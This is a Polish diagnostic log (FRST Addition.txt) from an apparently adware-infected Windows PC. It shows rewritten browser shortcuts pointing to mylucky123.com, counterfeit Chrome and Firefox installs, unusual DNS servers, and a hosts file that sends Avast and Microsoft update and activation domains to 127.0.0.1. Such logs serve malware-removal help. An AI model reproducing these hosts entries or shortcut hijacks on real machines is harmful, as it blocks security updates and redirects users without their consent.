C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Cupduck\Application\chrome.exe (Google Inc.) Shortcut: C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mozilla Firefox.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) Shortcut: C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Cupduck\Application\chrome.exe (Google Inc.) Shortcut: C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk -> C:\Program Files (x86)\Cupduck\Application\chrome.exe (Google Inc.) Shortcut: C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox (2).lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) Shortcut: C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) Shortcut: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) ShortcutWithArgument: C:\Users\administratorka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder\WarThunder.lnk -> C:\Users\administratorka\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) -> --app=hxxp://go.playmmogames.com/aff_c?offer_id=698&aff_id=1034&source=3&click_id=8c1ccf982237688bd01793e73813de09e84cc4f8 --app-window-size=1366,768 ShortcutWithArgument: C:\Users\administratorka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.mylucky123.com/?type=sc&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB ShortcutWithArgument: C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WarThunder.lnk -> C:\Users\administratorka\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) -> --app=hxxp://go.playmmogames.com/aff_c?offer_id=698&aff_id=1034&source=3&click_id=8c1ccf982237688bd01793e73813de09e84cc4f8 --app-window-size=1366,768 ShortcutWithArgument: C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk -> C:\Users\administratorka\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://bigfarm.goodgamestudios.com/?w=239064 ShortcutWithArgument: C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk -> C:\Users\administratorka\AppData\Local\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005 ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Przeglądarka Opera.lnk -> C:\Program Files (x86)\Opera\launcher.exe (Opera Software) -> hxxp://www.mylucky123.com/?type=sc&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB ShortcutWithArgument: C:\Users\Public\Desktop\Przeglądarka Opera.lnk -> C:\Program Files (x86)\Opera\launcher.exe (Opera Software) -> hxxp://www.mylucky123.com/?type=sc&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB ==================== Załadowane moduły (filtrowane) ============== 2018-01-18 00:21 - 2015-06-01 08:43 - 002106368 _____ () C:\Program Files\English To Chaser\English To Chaser.dll 2018-01-22 22:52 - 2018-01-24 10:53 - 000576000 _____ () C:\Windows\TEMP\g8FED.tmp.exe 2018-01-09 15:21 - 2018-01-09 15:21 - 000084808 _____ () C:\Program Files\CCleaner\lang\lang-1045.dll 2017-11-02 11:51 - 2017-11-02 11:51 - 000199864 _____ () C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe 2017-05-24 09:54 - 2017-05-23 06:56 - 000116376 _____ () C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe 2016-09-15 20:00 - 2016-09-15 20:00 - 000169064 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll 2018-01-23 22:49 - 2018-01-23 22:49 - 005779600 _____ () C:\Program Files\AVAST Software\Avast\defs\18012308\algo.dll 2016-09-15 20:00 - 2016-09-15 20:00 - 000482928 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll 2016-09-15 20:00 - 2016-09-15 20:00 - 048936448 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll - - 000000000 _____ () c:\programdata\package cache\{e01cb7f1-3e88-4450-1764-b3cc1e205c4a}v10.1.14393.795\installers\30daf459e79c5d26366654b1b482e87.cab:dp 2016-07-07 20:47 - 2011-12-16 09:39 - 001198872 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll 2018-01-23 00:31 - 2018-01-23 10:45 - 001495552 _____ () C:\Users\administratorka\AppData\Local\78EB64E2-9B4A-6165-8364-8CA886EF2CC0\{65C50EFB-8758-65EB-196A-2E1D121C8E04} ==================== Alternate Data Streams (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) ==================== Tryb awaryjny (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) ==================== Powiązania plików (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) ==================== Internet Explorer - Witryny zaufane i z ograniczeniami =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) ==================== Hosts - zawartość: ========================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2018-01-06 16:07 - 2018-01-23 10:45 - 000013603 _____ C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 genuine.microsoft.com 127.0.0.1 mpa.one.microsoft.com 127.0.0.1 sls.microsoft.com 127.0.0.1 gf.tools.avast.com 127.0.0.1 pair.ff.avast.com 127.0.0.1 ipm-provider.ff.avast.com 127.0.0.1 ipm-provider.ff.avast.com 127.0.0.1 ipm-provider.ff.avast.com 127.0.0.1 id.avast.com 127.0.0.1 v4618535.iavs9x.u.avast.com 127.0.0.1 v4618535.ivps9x.u.avast.com 127.0.0.1 v4618535.ivps9tiny.u.avast.com 127.0.0.1 v4618535.vpsnitro.u.avast.com 127.0.0.1 v4618535.vpsnitrotiny.u.avast.com 127.0.0.1 v4618535.iavs5x.u.avast.com 127.0.0.1 v7.stats.avast.com 127.0.0.1 v7.stats.avast.com 127.0.0.1 v7event.stats.avast.com 127.0.0.1 sm00.avast.com 127.0.0.1 submit5.avast.com 127.0.0.1 geoip.avast.com 127.0.0.1 w9448963.iavs9x.u.avast.com 127.0.0.1 w9448963.ivps9x.u.avast.com 127.0.0.1 w9448963.ivps9tiny.u.avast.com 127.0.0.1 w9448963.vpsnitro.u.avast.com 127.0.0.1 w9448963.vpsnitrotiny.u.avast.com 127.0.0.1 w9448963.iavs5x.u.avast.com 127.0.0.1 v7.stats.avast.com 127.0.0.1 v7.stats.avast.com 127.0.0.1 v7event.stats.avast.com Wykryto więcej niż wyliczono: 336 linii. ==================== Inne obszary ============================ (Obecnie brak automatycznej naprawy dla tej sekcji.) HKU\S-1-5-21-478647955-3472351390-1182581596-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\administratorka\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 82.163.143.176 - 82.163.142.178 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Zapora systemu Windows [funkcja włączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == ==================== Reguły Zapory systemu Windows (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [{EE920042-F88D-496E-BFB5-5E733F0238FB}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{1B51CE4A-8D14-4586-8747-88ECF028279E}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{908CEAC9-6DFC-4467-94C7-60B131E5B82A}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{45CCDF90-3F5D-4961-B973-BBAA0756C64F}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{C44F4BEE-6D0C-4183-AF55-43AFABB0C6CE}] => (Allow) C:\Program Files (x86)\DriverDoc\Solvusoftdd.exe FirewallRules: [{BF7818AE-EE92-4274-AA68-20D345C9DCC4}] => (Allow) D:\csgo\steamapps\common\Counter-Strike Global Offensive\csgo.exe FirewallRules: [{AE4B7D23-EB53-4DC5-8875-8B105F24514F}] => (Allow) D:\csgo\steamapps\common\Counter-Strike Global Offensive\csgo.exe FirewallRules: [TCP Query User{E1EE9EB6-3EA5-4F12-99B2-29A691EBB500}C:\users\administratorka\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\administratorka\appdata\roaming\utorrent\utorrent.exe FirewallRules: [UDP Query User{72BDD810-FD13-481A-9008-CA6D080C2367}C:\users\administratorka\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\administratorka\appdata\roaming\utorrent\utorrent.exe FirewallRules: [TCP Query User{A011035D-2B79-498D-9ED6-CF3725C333EE}D:\demo fifa\fifa 16 demo\fifa16_demo.exe] => (Allow) D:\demo fifa\fifa 16 demo\fifa16_demo.exe FirewallRules: [UDP Query User{3B637E17-27A1-4E83-BB8D-A07CE929E3AD}D:\demo fifa\fifa 16 demo\fifa16_demo.exe] => (Allow) D:\demo fifa\fifa 16 demo\fifa16_demo.exe FirewallRules: [{07459C72-8133-466C-9D7A-0CB137C7C689}] => (Block) D:\demo fifa\FIFA 16 DEMO\fifa16_demo.exe FirewallRules: [{5D1CDA29-66A3-4C5A-85F2-B08FCB38281E}] => (Block) D:\demo fifa\FIFA 16 DEMO\fifa16_demo.exe FirewallRules: [{097AF4C7-09FB-4318-9F89-93058133F663}] => (Block) D:\demo fifa\FIFA 16 DEMO\fifa16_demo.exe FirewallRules: [{91DA2D9C-B3B1-4EE0-84F6-0DB2CEFEC34E}] => (Allow) D:\theHunter\launcher\launcher.exe FirewallRules: [{B0F90C68-FC51-45F9-BE17-D89637B220A6}] => (Allow) D:\theHunter\launcher\launcher.exe FirewallRules: [TCP Query User{154F49DD-B072-408E-A3B0-D9C6AF9C2E8E}D:\thehunter\game\thehunter.exe] => (Allow) D:\thehunter\game\thehunter.exe FirewallRules: [UDP Query User{269CA464-347C-49D0-8C89-BD16C7D66A49}D:\thehunter\game\thehunter.exe] => (Allow) D:\thehunter\game\thehunter.exe FirewallRules: [{CC2E8C30-7DA6-491E-A36F-8A56FA6DCDB1}] => (Allow) D:\BF2\BF2.exe FirewallRules: [{38CEAD92-F323-4625-BF10-394C3BC1F154}] => (Allow) D:\BF2\BF2.exe FirewallRules: [{84B51CE8-5F7B-45A4-9EB4-54C6A83C9102}] => (Allow) D:\csgo\steamapps\common\diriptide\DeadIslandGame_x86_rwdi.exe FirewallRules: [{286055B5-E0E0-4F73-9967-F49FA1CE9328}] => (Allow) D:\csgo\steamapps\common\diriptide\DeadIslandGame_x86_rwdi.exe FirewallRules: [TCP Query User{D8573B7A-E265-4434-9D71-3E3F104CD0FA}D:\outlast_outlast whistleblower\binaries\win64\olgame.exe] => (Allow) D:\outlast_outlast whistleblower\binaries\win64\olgame.exe FirewallRules: [UDP Query User{634451AB-4A89-4397-9BF9-04413060D498}D:\outlast_outlast whistleblower\binaries\win64\olgame.exe] => (Allow) D:\outlast_outlast whistleblower\binaries\win64\olgame.exe FirewallRules: [{D8AA163C-B466-4B7D-B6BD-BFCE10D9B8CD}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe FirewallRules: [{DE669498-63D9-431F-9C93-DC709F99BB8E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{84BBBC97-9B9B-4479-A6A9-4E144B177580}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [TCP Query User{4D159EF0-9EA7-436A-8495-0EF935B53243}D:\fifa 14\fifa 14\game\fifa14.exe] => (Allow) D:\fifa 14\fifa 14\game\fifa14.exe FirewallRules: [UDP Query User{6251FF76-0BEA-478E-9C7E-8382ED5922A5}D:\fifa 14\fifa 14\game\fifa14.exe] => (Allow) D:\fifa 14\fifa 14\game\fifa14.exe FirewallRules: [{16F83FF4-03EA-41B0-A088-9A2E144CB24C}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{284F473C-A3AE-471A-875C-7B3DF67863FD}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [TCP Query User{DE253330-56B9-46C0-AA65-2030E798C6F1}D:\glest_3.2.2\glest.exe] => (Allow) D:\glest_3.2.2\glest.exe FirewallRules: [UDP Query User{0D0A13D7-5A4D-4D22-8D16-3131F8A1B290}D:\glest_3.2.2\glest.exe] => (Allow) D:\glest_3.2.2\glest.exe FirewallRules: [{87D81869-0D9C-45B8-8A95-6429DC6DD331}] => (Allow) C:\Program Files (x86)\Cupduck\Application\chrome.exe FirewallRules: [{40ED8367-7F9A-4F6D-8278-8B291D111B52}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{FF8CE98A-1B92-469E-9518-61F4E4889E52}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe FirewallRules: [TCP Query User{9D36FB81-C7DE-45B7-9455-FC2D509EF70B}C:\users\administratorka\appdata\local\mycomgames\mycomgames.exe] => (Allow) C:\users\administratorka\appdata\local\mycomgames\mycomgames.exe FirewallRules: [UDP Query User{34DB1804-6E4B-48E3-989E-C733CFB3C618}C:\users\administratorka\appdata\local\mycomgames\mycomgames.exe] => (Allow) C:\users\administratorka\appdata\local\mycomgames\mycomgames.exe FirewallRules: [{4AA961F2-0A9D-478B-9397-7F4E40A14B71}] => (Allow) C:\Program Files (x86)\Opera\49.0.2725.47\opera.exe FirewallRules: [{5B7C89BC-919A-43C1-A842-099BE9987DD0}] => (Allow) D:\unity\Editor\Unity.exe FirewallRules: [{132910BB-AB48-46F0-A105-4268220B858B}] => (Block) D:\unity\Editor\Unity.exe FirewallRules: [{0FB065D2-521D-43A1-9BE4-D662F87C445D}] => (Allow) D:\unity\Editor\Data\Tools\nodejs\node.exe FirewallRules: [{4729FEC1-FF60-44D4-BC7B-8AEF16B9E26A}] => (Block) D:\unity\Editor\Data\Tools\nodejs\node.exe FirewallRules: [{3AC9C9EF-1121-4250-85C9-28815C1224ED}] => (Allow) C:\Program Files (x86)\Opera\49.0.2725.64\opera.exe FirewallRules: [{0A045C10-C075-42E5-9CFF-9C53FECE4C47}] => (Allow) C:\Windows\system32\rundll32.exe FirewallRules: [{197D3B84-4303-4DB9-B76F-6CAB10F2EF1C}] => (Allow) C:\Windows\System32\rundll32.exe FirewallRules: [{BECF9916-6C9D-4EB0-BCBC-745CAC9086A3}] => (Allow) C:\Windows\System32\rundll32.exe FirewallRules: [{7008E704-9590-412E-B6B3-B1E194911946}] => (Allow) C:\Windows\System32\rundll32.exe FirewallRules: [{49AD00F6-519D-4096-89F9-F44AAA60ACA1}] => (Allow) C:\Windows\System32\rundll32.exe ==================== Punkty Przywracania systemu ========================= ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= ==================== Błędy w Dzienniku zdarzeń: ========================= Dziennik Aplikacja: ================== Error: (01/24/2018 10:53:49 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: BM.exe, wersja: 1.0.1.5, sygnatura czasowa: 0x48aa7da7 Nazwa modułu powodującego błąd: BM.exe, wersja: 1.0.1.5, sygnatura czasowa: 0x48aa7da7 Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x0000acf3 Identyfikator procesu powodującego błąd: 0xe78 Godzina uruchomienia aplikacji powodującej błąd: 0x01d394f937ad7bc4 Ścieżka aplikacji powodującej błąd: C:\Program Files (x86)\KYE\WebMate\BM.exe Ścieżka modułu powodującego błąd: C:\Program Files (x86)\KYE\WebMate\BM.exe Identyfikator raportu: 799c0e3f-00ec-11e8-bf3f-902b344a279e Error: (01/24/2018 10:53:04 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (01/24/2018 10:52:50 AM) (Source: Winlogon) (EventID: 4103) (User: ) Description: Aktywacja licencji systemu Windows nie powiodła się. Błąd 0x00000000. Error: (01/24/2018 10:52:50 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: ) Description: Wystąpił błąd aktywacji licencji (slui.exe), kod błędu: 0x800401F9 Error: (01/23/2018 12:33:52 PM) (Source: SideBySide) (EventID: 33) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla "C:\Windows\System32\systemcpl.dll". Nie można odnaleźć zestawu zależnego Microsoft.Windows.Common-Controls,language="*",processorArchitecture="*",publicKeyToken="436865772d574741",type="win32",version="6.0.0.0". Użyj narzędzia sxstrace.exe, aby uzyskać szczegółową diagnozę. Error: (01/23/2018 10:43:42 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: BM.exe, wersja: 1.0.1.5, sygnatura czasowa: 0x48aa7da7 Nazwa modułu powodującego błąd: BM.exe, wersja: 1.0.1.5, sygnatura czasowa: 0x48aa7da7 Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x0000acf3 Identyfikator procesu powodującego błąd: 0xcf4 Godzina uruchomienia aplikacji powodującej błąd: 0x01d3942ea7385e12 Ścieżka aplikacji powodującej błąd: C:\Program Files (x86)\KYE\WebMate\BM.exe Ścieżka modułu powodującego błąd: C:\Program Files (x86)\KYE\WebMate\BM.exe Identyfikator raportu: e58977ff-0021-11e8-82f0-902b344a279e Error: (01/23/2018 10:43:07 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (01/23/2018 10:42:49 AM) (Source: Winlogon) (EventID: 4103) (User: ) Description: Aktywacja licencji systemu Windows nie powiodła się. Błąd 0x00000000. Error: (01/23/2018 10:42:49 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: ) Description: Wystąpił błąd aktywacji licencji (slui.exe), kod błędu: 0x800401F9 Error: (01/22/2018 10:14:52 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: BM.exe, wersja: 1.0.1.5, sygnatura czasowa: 0x48aa7da7 Nazwa modułu powodującego błąd: BM.exe, wersja: 1.0.1.5, sygnatura czasowa: 0x48aa7da7 Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x0000acf3 Identyfikator procesu powodującego błąd: 0xd28 Godzina uruchomienia aplikacji powodującej błąd: 0x01d3936175134d33 Ścieżka aplikacji powodującej błąd: C:\Program Files (x86)\KYE\WebMate\BM.exe Ścieżka modułu powodującego błąd: C:\Program Files (x86)\KYE\WebMate\BM.exe Identyfikator raportu: b36bba57-ff54-11e7-bf8f-902b344a279e Dziennik System: ============= Error: (01/24/2018 10:54:26 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: Usługa Grupowanie sieci równorzędnej zależy od usługi Protokół rozpoznawania nazw równorzędnych, której nie można uruchomić z powodu następującego błędu: %%-2140993535 Error: (01/24/2018 10:54:26 AM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Usługa Protokół rozpoznawania nazw równorzędnych zakończyła działanie; wystąpił następujący błąd: %%-2140993535 Error: (01/24/2018 10:54:26 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: Usługa Grupowanie sieci równorzędnej zależy od usługi Protokół rozpoznawania nazw równorzędnych, której nie można uruchomić z powodu następującego błędu: %%-2140993535 Error: (01/24/2018 10:54:26 AM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Usługa Protokół rozpoznawania nazw równorzędnych zakończyła działanie; wystąpił następujący błąd: %%-2140993535 Error: (01/24/2018 10:54:26 AM) (Source: PNRPSvc) (EventID: 102) (User: ) Description: Chmura protokołu rozpoznawania nazw równorzędnych nie została uruchomiona, ponieważ tworzenie tożsamości domyślnej nie powiodło się; kod błędu: 0x80630801. Error: (01/24/2018 10:54:26 AM) (Source: PNRPSvc) (EventID: 102) (User: ) Description: Chmura protokołu rozpoznawania nazw równorzędnych nie została uruchomiona, ponieważ tworzenie tożsamości domyślnej nie powiodło się; kod błędu: 0x80630801. Error: (01/24/2018 10:54:17 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: Usługa Grupowanie sieci równorzędnej zależy od usługi Protokół rozpoznawania nazw równorzędnych, której nie można uruchomić z powodu następującego błędu: %%-2140993535 Error: (01/24/2018 10:54:17 AM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Usługa Protokół rozpoznawania nazw równorzędnych zakończyła działanie; wystąpił następujący błąd: %%-2140993535 Error: (01/24/2018 10:54:17 AM) (Source: PNRPSvc) (EventID: 102) (User: ) Description: Chmura protokołu rozpoznawania nazw równorzędnych nie została uruchomiona, ponieważ tworzenie tożsamości domyślnej nie powiodło się; kod błędu: 0x80630801. Error: (01/24/2018 10:53:03 AM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: ZARZĄDZANIE NT) Description: Wystąpił błąd podczas próby odczytu lokalnego pliku hosts. CodeIntegrity: =================================== Date: 2018-01-24 10:52:47.524 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\user32.dll because the set of per-page image hashes could not be found on the system. Date: 2018-01-24 00:57:01.591 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\user32.dll because the set of per-page image hashes could not be found on the system. Date: 2018-01-24 00:00:50.242 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\user32.dll because the set of per-page image hashes could not be found on the system. Date: 2018-01-23 23:18:30.907 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\user32.dll because the set of per-page image hashes could not be found on the system. Date: 2018-01-23 22:11:28.105 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\user32.dll because the set of per-page image hashes could not be found on the system. Date: 2018-01-23 16:16:15.719 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\user32.dll because the set of per-page image hashes could not be found on the system. Date: 2018-01-23 14:59:34.387 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\user32.dll because the set of per-page image hashes could not be found on the system. Date: 2018-01-23 14:02:09.325 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\user32.dll because the set of per-page image hashes could not be found on the system. Date: 2018-01-23 13:56:04.429 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\user32.dll because the set of per-page image hashes could not be found on the system. Date: 2018-01-23 11:39:43.042 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\user32.dll because the set of per-page image hashes could not be found on the system. ==================== Statystyki pamięci =========================== Procesor: Intel(R) Pentium(R) CPU G860 @ 3.00GHz Procent pamięci w użyciu: 36% Całkowita pamięć fizyczna: 4059.79 MB Dostępna pamięć fizyczna: 2594.36 MB Całkowita pamięć wirtualna: 8117.77 MB Dostępna pamięć wirtualna: 6435.53 MB ==================== Dyski ================================ Drive c: () (Fixed) (Total:52.51 GB) (Free:3.22 GB) NTFS Drive d: (Nowy) (Fixed) (Total:878.91 GB) (Free:793.07 GB) NTFS ==================== MBR & Tablica partycji ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: EF60BDAB) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=52.5 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=878.9 GB) - (Type=07 NTFS) ==================== Koniec Addition.txt ============================